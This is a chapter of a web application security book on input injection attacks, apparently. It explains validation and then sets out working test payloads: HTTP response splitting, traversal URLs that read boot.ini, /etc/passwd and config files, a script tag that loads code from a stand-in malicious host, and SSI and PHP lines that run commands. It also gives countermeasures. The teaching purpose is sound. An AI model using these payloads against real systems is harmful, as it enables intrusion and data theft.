CHAPTER 6
INPUT INJECTION ATTACKS

Input validation serves as a first line of defense for a web application. Many vulnerabilities like SQL injection, HTML injection (and its subset of cross-site scripting), and verbose error messages are predicated on the ability of an attacker to inject some type of unexpected or malicious input to the application. When properly implemented, input validation routines ensure that the data is in a format, type, length, and range that is useful to the application. Without these checks, the confidentiality, integrity, and availability of an application and its information may be at risk.

Imagine a ZIP code field for an application’s shipping address form. Without a valid ZIP code, the postal service will not be able to deliver the mail quickly. We know that a ZIP code should consist of only digits. We also know that it should be at least 5 digits in length. Optionally, there can be 5 digits, a hyphen, and an additional 4 digits (ZIP plus 4), making a total of 10 characters. So the first validation routine will be a length check. Does the input contain 5 or 10 characters? The second check will be for data type. Does the input contain any characters that are not numbers? If it is 5 characters in length, then it should be only digits. If it is 10 characters, there should be 9 digits and a hyphen as the 6th character. Validation of this ZIP format would involve ensuring no other characters besides digits exist, with the exception of a hyphen in position 6. To check the range of the input, we would verify that each digit was 0 to 9.

Since we’re working with a finite set of codes, we could add another check to query the list of known valid ZIP codes from zip4.usps.com or an offline copy of the list such as a text file or database. This check ensures the input is in the valid set of ZIP codes and acts as an even stronger form of input validation. For example, 12345 is a valid ZIP code belonging to General Electric in New York. They often get mail addressed to Santa Claus, North Pole 12345. However, 00000 is not a valid ZIP code; even though it passes the type, format, and length checks, it would take this additional check to determine its validity. This chapter focuses on the dangers inherent in placing trust in user-supplied data and the ways an application can be attacked if it does not properly restrict the type of data it expects.
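The ZIP code checks described above can be sketched in a few lines of server-side Python. This is only an illustration under stated assumptions: the function names are hypothetical, and KNOWN_ZIP_CODES is a tiny stand-in for a real lookup against the published list of valid codes.

```python
import re

# Exactly 5 digits, optionally followed by a hyphen and 4 more digits.
# [0-9] is used instead of \d because \d also matches non-ASCII digits.
ZIP_PATTERN = re.compile(r"[0-9]{5}(-[0-9]{4})?")

# Hypothetical stand-in for a query against the real list of ZIP codes.
KNOWN_ZIP_CODES = {"12345", "10001", "94105"}


def is_well_formed_zip(value: str) -> bool:
    """Length, type, format, and range checks for ZIP and ZIP plus 4."""
    if len(value) not in (5, 10):
        return False
    return ZIP_PATTERN.fullmatch(value) is not None


def is_known_zip(value: str) -> bool:
    """Stronger check: the 5-digit prefix must be in the known set."""
    return is_well_formed_zip(value) and value[:5] in KNOWN_ZIP_CODES
```

With this sketch, 00000 passes is_well_formed_zip but fails is_known_zip, which mirrors the distinction drawn above between format checks and membership in the valid set.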

Data validation can be complex, but it’s a major basis of application security. Application programmers must exercise a little prescience to figure out all of the possible values that a user might enter into a form field. We just discussed how to perform the type, length, format, and range checks for a ZIP code. These tests can be programmed in JavaScript, placed in the HTML page, and served over SSL. The JavaScript solution sounds simple enough at first glance, but it is also one of the biggest mistakes made by developers. As you will see in the upcoming sections, client-side input validation routines can be bypassed and SSL only preserves the confidentiality of a web transaction. In other words, you can’t trust the web browser to perform the security checks you expect, and encrypting the connection (via SSL) has no bearing on the content of the data submitted to the application.

EXPECT THE UNEXPECTED

One of the biggest failures of input validation is writing the routines in JavaScript and placing them in the browser. At first, it may seem desirable to use any client-side scripting language for validation routines because the processing does not have to be performed on the server. Client-side filters are simple to implement and are widely supported among web browsers (although individual browser quirks still lead to developer headaches). Most importantly, they move a lot of processing from the web server to the end user’s system. This is really a Pyrrhic victory for the application. The web browser is an untrusted, uncontrollable environment, because all data coming from and going to the web browser can be modified in transit regardless of input validation routines. If performance is an issue, it is much cheaper to buy the hardware for another web server to handle the additional server-side input validation processing than to wait for a malicious user to compromise the application with a simple %0a in a parameter.

Attacks against input validation routines can target different aspects of the application. Understanding how an attacker might exploit an inadequate validation routine is important. The threats go well beyond mere “garbage data” errors.

Data storage. This includes characters used in SQL injection attacks. These characters can be used to rewrite the database query so it performs a custom action for the attacker. An error might reveal information as simple as the programming language used in the application or as detailed as a raw SQL query sent from the application to its database.

Other users. This includes cross-site scripting and other attacks related to “phishing.” The attacker might submit data that rewrites the HTML to steal information from an unsuspecting user or mislead that user into divulging sensitive information.

Web server’s host. These attacks may be specific to the operating system, such as inserting a semicolon to run arbitrary commands on a Unix web server. An application may intend to execute a command on the web server, but be tricked into executing alternate commands through the use of special characters.

Application content. An attacker may be able to generate errors that reveal information about the application’s programming language. Other attacks might bypass restrictions on the types of files retrieved by a browser. For example, many versions of the Nimda worm used an alternate encoding of a slash character (used to delimit directories) to bypass the IIS security check that was supposed to prevent users from requesting files outside of the web document root.

Buffer overflows in the server. Overflow attacks have plagued programs for years and web applications are no different. This attack involves passing extremely large input into an application that ultimately extends beyond its allocated memory space and thus corrupts other areas in memory. The result may be an application crash, or when specially crafted input is supplied, it could end up executing arbitrarily supplied code. Buffer overflows are typically more of a concern for compiled languages like C and C++ than for interpreted languages like Perl and Python. The nature of web platforms based on .NET and Java makes application-layer buffer overflows very difficult because they don’t allow the programmer to deal directly with stack and heap allocations (which are the playground of buffer overflows). A buffer overflow will more likely exist in the language platform.

Obtain arbitrary data access. A user may be able to access data for a peer user, such as one customer being able to view another customer’s billing information. A user may also be able to access privileged data, such as an anonymous user being able to enumerate, create, or delete users. Data access also applies to restricted files or administration areas of the application.

WHERE TO FIND ATTACK VECTORS

Every GET and POST parameter is a potential target for input validation attacks. Altering argument values, whether they are populated from FORM data or generated by the application, is a trivial feat. The easiest points of attack are input fields in forms. Common fields are Login Name, Password, Address, Phone Number, Credit Card Number, and Search. Other fields that use drop-down menus should not be overlooked, either. The first step is to enumerate these fields and their approximate input type.

Don’t be misled into thinking that input validation attacks can only be performed against fields that the user must complete. Every variable in the GET or POST request can be attacked. The attack targets can be identified by performing an in-depth crawl of the application that simultaneously catalogs files, parameters, and form fields. This is often done using automated tools.

Cookie values are another target. Cookies contain values that might never be intended for manipulation by a user, but an attacker can still alter them to deliver SQL injection or other injection payloads.

The cookie is simply a specific instance of an HTTP header. In fact, any HTTP header is a vector for input validation attacks. Another example of an HTTP header-targeted attack is HTTP response splitting, in which a legitimate response is prematurely truncated in order to inject a forged set of headers (usually cookies or cache-control, which do the maximum damage client-side).

Let’s take a closer look at HTTP response splitting. This attack targets applications that use parameters to indicate redirects. For example, here is a potentially vulnerable URL:

   http://website/redirect.cgi?page=http://website/welcome.cgi

A good input validation routine would ensure that the value for the page parameter consists of a valid URL. Yet if arbitrary characters can be included, then the parameter might be rewritten with something like this:

   http://website/redirect.cgi?page=%0d%0aContent-Type:%20text/
   html%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/
   html%0d%0a%0d%0a%3chtml%3eHello, world!%3c/html%3e

The original value of page has been replaced with a series of characters that mimics the HTTP response headers from a web server and includes a simple HTML string for “Hello, world!” The malicious payload is more easily understood by replacing the encoded characters:

   Content-Type: text/html
   HTTP/1.1 200 OK
   Content-Type: text/html
   <html>Hello, world!</html>

The end result is that the web browser displays this faked HTML content rather than the HTML content intended for the redirect. The example appears innocuous, but a malicious attack could include JavaScript or content that appears to be a request for the user’s password, Social Security number, credit card information, or other sensitive information. The point of this example is not how to create an effective phishing attack, but to demonstrate how a parameter’s content can be manipulated to produce unintended effects.
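To make the encoded payload easier to follow, here is a small Python sketch that decodes it with the standard library and shows one way a redirect parameter could be screened for carriage returns and line feeds. It assumes the payload begins with an encoded CR/LF pair (%0d%0a); the helper name contains_line_break is hypothetical, and a real routine would also confirm that the value is an expected URL.

```python
from urllib.parse import unquote

# The value of the page parameter, assuming it starts with %0d%0a.
payload = (
    "%0d%0aContent-Type:%20text/html"
    "%0d%0aHTTP/1.1%20200%20OK"
    "%0d%0aContent-Type:%20text/html"
    "%0d%0a%0d%0a%3chtml%3eHello, world!%3c/html%3e"
)


def contains_line_break(value: str) -> bool:
    """Return True if the URL-decoded value contains CR or LF."""
    decoded = unquote(value)
    return "\r" in decoded or "\n" in decoded


# Each %0d%0a becomes a CR/LF pair, which is what ends an HTTP header line.
decoded = unquote(payload)
print(repr(decoded))
```

A value that makes contains_line_break return True has no business in a redirect target, so rejecting it outright is a reasonable first check.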

BYPASS CLIENT-SIDE VALIDATION ROUTINES

If your application’s input validation countermeasures can be summarized with one word, JavaScript, then the application is not as secure as you think. Client-side JavaScript can always be bypassed. Some personal proxy, personal firewall, and cookie-management software tout their ability to strip pop-up banners and other intrusive components of a web site. Many computer professionals (paranoiacs?) turn off JavaScript completely in order to avoid the latest e-mail virus. In short, there are many legitimate reasons and straightforward methods for Internet users to disable JavaScript.

Of course, disabling JavaScript tends to cripple most web applications. Luckily, we have several tools that help surgically remove JavaScript or enable us to submit content after the JavaScript check has been performed, which allows us to bypass client-side input validation. With a local proxy such as Burp, we can hold a GET or POST request before it is sent to the server. By doing so, we can enter data in the browser that passes the validation requirements, but then modify any value in the proxy while it’s held before forwarding it along to the server.

COMMON INPUT INJECTION ATTACKS

Let’s examine some common input validation attack payloads. Even though many of the attacks merely dump garbage characters into the application, other payloads contain specially crafted strings.

Buffer Overflow

Buffer overflows are less likely to appear in applications written in interpreted or high-level programming languages. For example, you would be hard-pressed to write a vulnerable application in PHP or Java. Yet an overflow may exist in one of the language’s built-in functions. In the end, it is probably better to spend time on other input validation issues, session management, and other web security topics. Of course, if your application consists of a custom ISAPI filter for IIS or a custom Apache module, then testing for buffer overflows or, perhaps more effectively, conducting a code security review is a good idea (see Chapter 10).

To execute a buffer overflow attack, you merely dump as much data as possible into an input field. This is the most brutish and inelegant of attacks, but useful when it returns an application error. Perl is well suited for conducting this type of attack. One instruction creates a string of whatever length is necessary to launch against a parameter:

   $ perl -e 'print "a" x 500'
   aaaaaaa...repeated 500 times

You can create a Perl script to make the HTTP requests (using the LWP module), or dump the output through netcat. Instead of submitting the normal argument, wrap the Perl line in back ticks and replace the argument. Here’s the normal request:

   $ echo -e "GET /login.php?user=faustus HTTP/1.0\n\n" | \
   nc -vv website 80

Here’s the buffer test, calling on Perl from the command line:

   $ echo -e "GET /login.php?user=\
   > `perl -e 'print "a" x 500'` HTTP/1.0\n\n" | \
   nc -vv website 80

This sends a string of 500 "a" characters for the user value to the login.php file. This Perl trick can be used anywhere on the Unix (or Cygwin) command line. For example, combining this technique with the cURL program reduces the problem of dealing with SSL:

   $ curl https://website/login.php?user=`perl -e 'print "a" x 500'`

As you try buffer overflow tests with different payloads and different lengths, the target application may return different errors. These errors might all be “password incorrect,” but some of them might indicate boundary conditions for the user argument. The rule of thumb for buffer overflow testing is to follow basic differential analysis or anomaly detection:

1. Send a normal request to an application and record the server’s response.

2. Send the first buffer overflow test to the application, and record the server’s response.

3. Send the next buffer, and record the server’s response.

4. Repeat step 3 as necessary.

Whenever the server’s response differs from that of a “normal” request, examine what has changed. This helps you track down the specific payload that produces an error (such as 7,809 slashes on the URL are acceptable, but 7,810 are not).
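The differential analysis steps above can be sketched as a short Python routine. Everything here is illustrative: find_anomalies and fake_send are hypothetical names, and fake_send is a stand-in for a real HTTP client so that the flow can be followed without a network connection.

```python
from typing import Callable, Iterable, List, Tuple

Response = Tuple[int, str]  # (status code, response body)


def find_anomalies(
    send: Callable[[str], Response],
    normal_value: str,
    lengths: Iterable[int],
    fill: str = "a",
) -> List[Tuple[int, int, str]]:
    """Return (length, status, body) for responses that differ from the baseline."""
    baseline = send(normal_value)          # step 1: record a normal response
    anomalies = []
    for length in lengths:                 # steps 2 to 4: send each test buffer
        response = send(fill * length)
        if response != baseline:           # anything different deserves a look
            anomalies.append((length, response[0], response[1]))
    return anomalies


def fake_send(user: str) -> Response:
    """Stand-in for the target: pretends to fail above 1,000 characters."""
    if len(user) > 1000:
        return (500, "Internal Server Error")
    return (200, "password incorrect")


results = find_anomalies(fake_send, "faustus", [500, 1000, 1001, 2000])
print(results)
```

Comparing whole responses is the simplest possible test. Against a real application, pages that embed timestamps or session tokens would need a looser comparison, such as status code plus response length.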

In some cases, the buffer overflow attack enables the attacker to execute arbitrary commands on the server. Such an exploit is difficult to develop the first time, but simple to replicate. In other words, experienced security auditing is required to find a vulnerability and to create an exploit, but an unsophisticated attacker can download and run a premade exploit.


NOTE

Most of the time these buffer overflow attacks are performed “blind.” Without access to the application to attach a debugger or to view log or system information, crafting a buffer overflow that results in system command execution is very difficult. The FrontPage Server Extensions overflow on IIS, for example, could not have been crafted without full access to a system for testing.


Canonicalization (dot-dot-slash)

These attacks target pages that use template files or otherwise reference alternate files on the web server. The basic form of this attack is to move outside of the web document root in order to access system files, e.g., “../../../../../../../../../boot.ini”. The web server itself (IIS or Apache, for example) is hopefully smart enough to stop this. IIS fell victim to such problems due to logical missteps in decoding URL characters and performing directory traversal security checks. Two well-known examples are the IIS Superfluous Decode (..%255c..) and IIS Unicode Directory Traversal (..%c0%af..) vulnerabilities. More information about these vulnerabilities is at the Microsoft web site at http://www.microsoft.com/technet/security/bulletin/MS01-026.mspx and http://www.microsoft.com/technet/security/bulletin/MS00-078.mspx.

A web application’s security is always reduced to the lowest common denominator. Even a robust web server falls due to an insecurely written application. The biggest victims of canonicalization attacks are applications that use templates or parse files from the server. If the application does not limit the types of files that it is supposed to view, then files outside of the web document root are fair game. This type of functionality is evident from the URL and is not limited to any one programming language or web server:

   /menu.asp?dimlDisplayer=menu.html
   /webacc?User.html=login.htt
   /SWEditServlet?station_path=Z&publication_id=2043&template=login.tem
   /Getfile.asp?/scripts/Client/login.js
   /includes/printable.asp?Link=customers/overview.htm

This technique succeeds against web servers when the web application does not verify the location and content of the file requested. For example, part of the URL for the login page of Novell’s web-based GroupWise application is /servlet/webacc?User.html=login.htt. This application is attacked by manipulating the User.html parameter:

   /servlet/webacc?User.html=../../../WebAccess/webacc.cfg%00

This directory traversal takes us out of the web document root and into configuration directories. Suddenly, the login page is a window to the target web server—and we don’t even have to log in!


TIP

Many embedded devices, media servers, and other Internet-connected devices have rudimentary web servers—take a look at many routers and wireless access points sold for home networks. When confronted by one of these servers, always try a simple directory traversal on the URL to see what happens. All too often security plays second fiddle to application size and performance!


Advanced Directory Traversal

Let’s take a closer look at the GroupWise example. A normal HTTP request returns the HTML content of login.htm:

   <HTML>
   <HEAD>
   <TITLE>GroupWise WebAccess Login</TITLE>
   </HEAD>
   <!login.htm>
   ..remainder of page truncated...

The first alarm that goes off is that the webacc servlet takes an HTML file (login.htt) as a parameter because it implies that the application loads and presents the file supplied to the User.html parameter. If the User.html parameter receives a value for a file that does not exist, then we would expect some type of error to occur. Hopefully, the error gives us some useful information. An example of the attack in a URL, http://website/servlet/webacc?user.html=nosuchfile, produces the following response:

   File does not exist:
   c:\Novell\java\servlets\com\novell\webaccess\
   templates/nosuchfile/login.htt
   Cannot load file:
   c:\Novell\java\servlets\com\novell\webaccess\
   templates/nosuchfile/login.htt.

The error discloses the application’s full installation path. Additionally, we discover that the login.htt file is appended by default to a directory specified in the user.html parameter. This makes sense because the application must need a default template if no user.html argument is passed. The login.htt file, however, gets in the way of a good and proper directory traversal attack. To get around this, we’ll try an old trick developed for use against Perl-based web applications: the null character. For example:

   http://website/servlet/webacc?user.html=../../../../../../../boot.ini%00
   [boot loader]
   timeout=30
   default=multi(0)disk(0)rdisk(0)partition(5)\WINNT
   [operating systems]
   multi(0)disk(0)rdisk(0)partition(5)\WINNT="Win2K" /fastdetect
   C:\BOOTSECT.BSD="OpenBSD"
   C:\BOOTSECT.LNX="Linux"
   C:\CMDCONS\BOOTSECT.DAT="Recovery Console" /cmdcons

Notice that even though the application appends login.htt to the value of the user.html parameter, we have succeeded in obtaining the content of a Windows boot.ini file. The trick is appending %00 to the user.html argument. The %00 is the URL-encoded representation of the null character, which carries a very specific meaning in a programming language like C when used with string variables. In the C language, a string is really just an arbitrarily long array of characters. In order for the program to know where a string ends, it reads characters until it reaches a special character to delimit the end: the null character. Therefore, the web server will pass the original argument to the user.html variable, including the %00. When the servlet engine interprets the argument, it still appends login.htt, turning the entire argument string into a value like this:

   ../../../../../../../boot.ini%00login.htt

A programming language like Perl actually accepts null characters within a string; it doesn’t use them as a delimiter. However, operating systems are written in C (and a mix of C++). When a language like Perl or Java must interact with a file on the operating system, it must interact with a function most likely written in C. Even though a string in Perl or Java may contain a null character, the operating system function will read each character in the string until it reaches the null delimiter, which means the login.htt is ignored. Web servers decode %xx sequences as hexadecimal values. Consequently, the %00 character is first translated by the web server to the null character, and then passed onto the application code (Perl in this case), which accepts the null as part of the parameter’s value.
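The mismatch between a high-level string and a C string can be seen in a short Python sketch. It does not touch the filesystem; it uses the standard ctypes module only to show where a C routine would stop reading. The helper name as_c_function_sees is hypothetical.

```python
import ctypes
from urllib.parse import unquote_to_bytes


def as_c_function_sees(path: bytes) -> bytes:
    """Return the part of `path` that a C string routine would read."""
    # create_string_buffer copies the bytes into a C char array;
    # its .value attribute stops at the first NUL, as C string functions do.
    return ctypes.create_string_buffer(path).value


# The web server decodes %00 to a NUL byte, then the application
# appends its default template name to the user-supplied value.
requested = unquote_to_bytes("../../../boot.ini%00") + b"login.htt"

print(requested)                      # the full value, NUL included
print(as_c_function_sees(requested))  # what a C file routine would open
```

The high-level value still ends in login.htt, while the C view ends at boot.ini. Note that Python’s own open() refuses a path containing a null byte with a ValueError, so this particular trick depends on the platform and runtime in use.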


TIP

Alternate character encoding with Unicode may also present challenges in the programming language. The IIS Unicode Directory Traversal vulnerability was based on using an alternate Unicode encoding to represent the slash character.


Forcing an application into accessing arbitrary files can sometimes take more tricks than just the %00. The following are some more techniques.

../../file.asp%00.jpg The application performs rudimentary name validation that requires an image suffix (.jpg or .gif).

../../file.asp%0a The newline character works just like the null. This might work when an input filter strips %00 characters, but not other malicious payloads.

/valid_dir/../../../file.asp The application performs rudimentary name validation on the file source. It must be within a valid directory. Of course, if it doesn’t remove directory traversal characters, then you can easily escape the directory.

valid_file.asp../../../../file.asp The application performs name validation on the file, but only performs a partial match on the filename.

%2e%2e%2f%2e%2e%2ffile.asp (../../file.asp) The application performs name validation before the argument is URL decoded, or the application’s name validation routine is weak and cannot handle URL-encoded characters.
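The last technique in the list works because of the order of operations, which a brief Python sketch can illustrate. Both function names are hypothetical, and neither check is a complete defense; the point is only that a filter inspecting the raw value sees nothing suspicious.

```python
from urllib.parse import unquote


def naive_check(raw_value: str) -> bool:
    """Flawed: inspects the value before it has been URL decoded."""
    return "../" not in raw_value


def decode_then_check(raw_value: str) -> bool:
    """Decodes once, then looks for traversal sequences."""
    decoded = unquote(raw_value)
    return "../" not in decoded and "..\\" not in decoded


encoded = "%2e%2e%2f%2e%2e%2ffile.asp"

print(naive_check(encoded))        # the raw string contains no "../"
print(decode_then_check(encoded))  # the decoded string does
```

This sketch decodes only once. If another component decodes the value a second time, a doubly encoded payload could slip through in the same way.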

Navigating Without Directory Listings

Canonicalization attacks allow directory traversal inside and outside of the web document root. Unfortunately, they rarely provide the ability to generate directory listings—and it’s rather difficult to explore the terrain without a map! However, there are some tricks that ease the difficulty of enumerating files. The first trick is to find out where the actual directory root begins. This is a drive letter on Windows systems and most often the root (“/”) directory on Unix systems. IIS makes this a little easier, since the top-most directory is “InetPub” by default. For example, find the root directory (drive letter) on an IIS host by continually adding directory traversals until you successfully obtain a target HTML file. Here’s an abbreviated example of tracking down the root for a target application’s default.asp file:

   Sent: /includes/printable.asp?Link=../inetpub/wwwroot/default.asp
   Return: Microsoft VBScript runtime error '800a0046'
   File not found
   /includes/printable.asp, line 10
   Sent: /includes/printable.asp?Link=../../inetpub/wwwroot/default.asp
   Return: Microsoft VBScript runtime error '800a0046'
   File not found
   /includes/printable.asp, line 10
   Sent: /includes/printable.asp?Link=../../../inetpub/wwwroot/
   default.asp
   Return: Microsoft VBScript runtime error '800a0046'
   File not found
   /includes/printable.asp, line 10
   Sent: /includes/printable.asp?Link=../../../../inetpub/wwwroot/
   default.asp
   Return: Microsoft VBScript runtime error '800a0046'
   ...source code of default.asp returned!...

It must seem pedantic to go through the trouble of finding the exact number of directory traversals when a simple ../../../../../../../../../../ would suffice. Yet, before you pass judgment, take a closer look at the number of escapes. There are four directory traversals necessary before the printable.asp file dumps the source code. If we assume that the full path is /inetpub/wwwroot/includes/printable.asp, then we should need to go up three directories. The extra traversal steps imply that the /includes directory is mapped somewhere else on the drive, or the default location for the Link files is somewhere else.


NOTE

The printable.asp file we found is vulnerable to this attack because the file does not perform input validation. This is evident from a single line of code from the file: Link = "D:\Site server\data\publishing\documents\"&Request.QueryString("Link"). Notice how many directories deep this is?


Error codes can also help us enumerate directories. We’ll use information such as “Path not found” and “Permission denied” to track down the directories that exist on a web server. Going back to the previous example, we’ll use the printable.asp to enumerate directories:

   Sent: /includes/printable.asp?Link=../../../../inetpub
   Return: Microsoft VBScript runtime error '800a0046'
   Permission denied
   /includes/printable.asp, line 10
   Sent: /includes/printable.asp?Link=../../../../inetpub/borkbork
   Return: Microsoft VBScript runtime error '800a0046'
   Path not found
   /includes/printable.asp, line 10
   Sent: /includes/printable.asp?Link=../../data
   Return: Microsoft VBScript runtime error '800a0046'
   Permission denied
   /includes/printable.asp, line 10
   Sent: /includes/printable.asp?Link=../../../../Program%20Files/
   Return: Microsoft VBScript runtime error '800a0046'
   Permission denied
   /includes/printable.asp, line 10

These results tell us that it is possible to distinguish between files or directories that exist on the web server and those that do not. We verified that the /inetpub and “Program Files” directories exist, but the error indicates that the web application doesn’t have read access to them. If the /inetpub/borkbork directory had returned the error “Permission denied,” then this technique would have failed because we would have no way of distinguishing between real directories (Program Files) and nonexistent ones (borkbork). We also discovered a data directory during this enumeration phase. This directory is within the mysterious path (D:\Site server\data\publishing\documents) that printable.asp prepends to the Link value.

To summarize the steps for enumerating files:

1. Examine error codes. Determine if the application returns different errors for files that do not exist, directories that do not exist, files that exist (but perhaps have read access denied), and directories that exist.

2. Find the root. Add directory traversal characters until you can determine where the drive letter or root directory starts.

3. Move down the web document root. Files in the web document root are easy to enumerate. You should already have listed most of them when first surveying the application. These files are easier to find because they are a known quantity.

4. Find common directories. Look for temporary directories (/temp, /tmp, /var), program directories (/Program Files, /winnt, /bin, /usr/bin), and popular directories (/home, /etc, /downloads, /backup).

5. Try to access directory names. If the application has read access to the directory, it will list the directory contents. This makes file enumeration easy!


NOTE

A good web application tester’s notebook should contain recursive directory listings for common programs associated with web servers. Having a reference to the directories and configuration files greatly improves the success of directory traversal attacks. The application list should include programs such as Lotus Domino, Microsoft Site Server, and Apache Tomcat.


Canonicalization Countermeasures

The best defense against canonicalization attacks is to remove all dots (.) from GET and POST parameters. The parsing engine should also catch dots represented in Unicode and hexadecimal.

Force all reads to happen from a specific directory. Apply regular expression filters that remove all path information preceding the expected filename. For example, reduce /path1/path2/./path3/file to /file.
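As a rough illustration of forcing reads into one directory, the following Python sketch keeps only the final filename component and then confirms that the resolved path still sits under the base directory. TEMPLATE_DIR and resolve_template are hypothetical names, and the sketch uses standard path functions in place of a regular expression filter.

```python
import os

# Hypothetical template directory; adjust to the application's layout.
TEMPLATE_DIR = "/var/www/templates"


def resolve_template(user_value: str) -> str:
    """Map a user-supplied name to a file inside TEMPLATE_DIR or raise ValueError."""
    if "\x00" in user_value:
        raise ValueError("null byte in filename")
    # Treat backslashes as separators too, then keep only the last component,
    # so /path1/path2/./path3/file is reduced to file.
    name = os.path.basename(user_value.replace("\\", "/"))
    if name in ("", ".", ".."):
        raise ValueError("no usable filename")
    base = os.path.realpath(TEMPLATE_DIR)
    candidate = os.path.realpath(os.path.join(base, name))
    # Defense in depth: after resolving symbolic links, the path must
    # still be inside the base directory.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes template directory")
    return candidate
```

A stricter variant would compare the resulting name against an explicit list of permitted templates, which removes the need to reason about path syntax at all.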

Secure filesystem permissions also mitigate this attack. First, run the web server as a least-privilege user: either as the “nobody” account on Unix systems or create a service account on Windows systems with the least privileges required to run the application. (See the “References & Further Reading” section for how to create a service account for ASP.NET applications.) Limit the web server account so it can only read files from directories specifically related to the web application.

Move sensitive files such as include files (*.inc) out of the web document root to a directory with proper access control. Ensure that anonymous Internet users cannot directly access directories containing sensitive files and that only users with proper authorization will be granted permission. This mitigates directory traversal attacks that are limited to viewing files within the document root. The server and privileged users are still able to access the files, but anonymous users cannot read them.

HTML Injection

Script attacks include any method of submitting HTML-formatted strings to an application that subsequently renders those tags. The simplest script attacks involve entering <script> tags into a form field. If the user-submitted contents of that field are redisplayed, then the browser interprets the contents as a JavaScript directive rather than displaying the literal value <script>. The real targets of this attack are other users of the application who view the malicious content and fall prey to social engineering attacks.

There are two prerequisites for this attack. First, the application must accept user input. This sounds obvious; however, the input does not have to come from form fields. We will list some methods that can be tested on the URL, but headers and cookies are valid targets as well. Second, the application must redisplay the user input. The attack occurs when an application renders the data, which become HTML tags that the web browser interprets.

Cross-site Scripting (XSS)

Cross-site scripting attacks place malicious code, usually JavaScript, in locations where other users see it. Target fields in forms can be addresses, bulletin board comments, and so forth. The malicious code usually steals cookies, which would allow the attacker to impersonate the victim or perform a social engineering attack, tricking the victim into divulging his or her password. This type of social engineering attack has plagued Hotmail, Gmail, and AOL.

This is not intended to be a treatise on JavaScript or uber-techniques for manipulating browser vulnerabilities. Here are three methods that, if successful, indicate that an application is vulnerable:

   <script>document.write(document.cookie)</script>
   <script>alert('Salut!')</script>
   <script src="http://www.malicious-host.foo/badscript.js"></script>

Notice that the last line calls JavaScript from an entirely different server. This technique circumvents most length restrictions because the badscript.js file can be arbitrarily long, whereas the reference is relatively short. In addition to a layer of obfuscation, URL shortening services can sometimes be used to further reduce the size of the string. These tests are simple to execute against forms. Simply try the strings in any field that is redisplayed. For example, many e-commerce applications present a verification page after you enter your address. Enter <script> tags for your street name and see what happens.

There are other ways to execute XSS attacks. As we alluded to previously, an application’s search engine is a prime target for XSS attacks. Enter the payload in the search field, or submit it directly to the URL:

   http://www.website.com/search.pl?qu=<script>alert('foo')</script>

We have found that error pages are often subject to XSS attacks. For example, the URL for a normal application error looks like this:

   http://www.website.com/errors.asp?Error=Invalid%20password

This displays a custom access denied page that says, “Invalid password.” Seeing a string on the URL reflected in the page contents is a great indicator of an XSS vulnerability. The attack would be created as:

   http://www.website.com/errors.asp?Error=<script%20src=...

That is, place the script tags on the URL where they are ultimately returned to the browser and executed.

With the ability to execute arbitrary script code, performing a wide array of attacks against the end user is possible. Modern browser exploitation frameworks make it trivial for an attacker to use premade attack modules on a victim of XSS to log keystrokes, perform distributed port scanning, detect Tor, or execute other browser functionality. There even exists support to integrate Metasploit attacks against Internet Explorer or execute Firefox plug-in exploits. Further information on browser exploitation frameworks can be found in the “References & Further Reading” section at the end of the chapter.

Embedded Scripts

Embedded script attacks lack the popularity of cross-site scripting, but they are not necessarily rarer. An XSS attack targets other users of the application. An embedded script attack targets the application itself. In this case, the malicious code is not a pair of <script> tags, but formatting tags. This includes SSI directives, ASP brackets, PHP brackets, SQL query structures, or even HTML tags. The goal is to submit data that, when displayed by the application, executes as a program instruction or mangles the HTML output. Program execution can enable the attacker to access server variables such as passwords and files outside of the web document root. Needless to say, an embedded script poses a major risk to the application. If the embedded script merely mangles the HTML output, then the attacker may be presented with source code that did not execute properly. This can still expose sensitive application data.

Execution tests fall into several categories. An application audit does not require complex tests or malicious code. If an injected ASP date() function returns the current date, then the application’s input validation routine is inadequate. ASP code is very dangerous because it can execute arbitrary commands or access arbitrary files:

   <%= date() %>

Server-side includes also permit command execution and arbitrary file access:

   <!--#include virtual="global.asa" -->
   <!--#include file="/etc/passwd" -->
   <!--#exec cmd="/sbin/ifconfig -a" -->

Embedded Java and JSP are equally dangerous:

   <% java.util.Date today = new java.util.Date(); out.println(today); %>

Finally, we don’t want to forget PHP:

   <? print(Date("l F d, Y")); ?>
   <? include '/etc/passwd' ?>
   <? passthru("id");?>

If one of these strings actually works, then there is something seriously broken in the application. Language tags, such as <? or <%, are usually processed before user input. This doesn’t mean that an extra %> won’t break a JSP file, but don’t be too disappointed if it fails.

A more viable test is to break table and form structures. If an application creates custom tables based on user input, then a spurious </table> tag might end the page prematurely. This could leave half of the page displaying normal HTML output and the other half displaying raw source code. This technique is useful against dynamically generated forms.

Cookies and Predefined Headers

Web application testers always review cookie contents. Cookies, after all, can be manipulated to impersonate other users or to escalate privileges. The application must read the cookie; therefore, cookies are an equally valid test bed for script attacks. In fact, many applications interpret additional information that is particular to your browser. The HTTP 1.1 specification defines a User-Agent header that identifies the web browser. You usually see some form of “Mozilla” in this string.

Applications use the User-Agent string to accommodate browser quirks (since no one likes to follow standards). The text-based browser, lynx, even lets you specify a custom string:

   $ lynx -dump -useragent="<script>" \
   > http://website/page2a.html?tw=tests
   ...output truncated...
   Netscape running on a Mac might send one like this:
   User Agent: Mozilla/4.5 (Macintosh; U; PPC)
   And FYI, it appears that the browser you're currently using to view
   this document sends this User Agent string:

What’s this? The application can’t determine our custom User-Agent string. If we view the source, then we see why this happens:

   <BLOCKQUOTE>
   <PRE>
   <script>
   </PRE>
   </BLOCKQUOTE>

So, our <script> tag was accepted after all. This is a prime example of a vulnerable application. The point here is that input validation affects any input that the application receives.
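The same header test can be scripted. The following is a minimal sketch in Python using the standard urllib module; the host name website.example is a hypothetical placeholder, and the code only builds the request so the header can be inspected. Nothing is sent.

```python
import urllib.request

# Hypothetical target; use only an application you are authorized to test.
url = "http://website.example/page2a.html?tw=tests"

# Any request header can carry a payload, not just form fields.
req = urllib.request.Request(url, headers={"User-Agent": "<script>"})

# urllib stores header names via str.capitalize(), hence "User-agent".
print(req.get_header("User-agent"))

# To actually send the request: urllib.request.urlopen(req).read()
```

If the response echoes the header value without encoding it, the page has the same weakness shown in the lynx example.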

HTML Injection Countermeasures

The most significant defense against script attacks is to turn all angle brackets into their HTML-encoded equivalents. The left bracket, <, is represented by &lt; and the right bracket, >, is represented by &gt;. This ensures the brackets are always stored and displayed in an innocuous manner. A web browser will never execute a &lt;script&gt; tag.
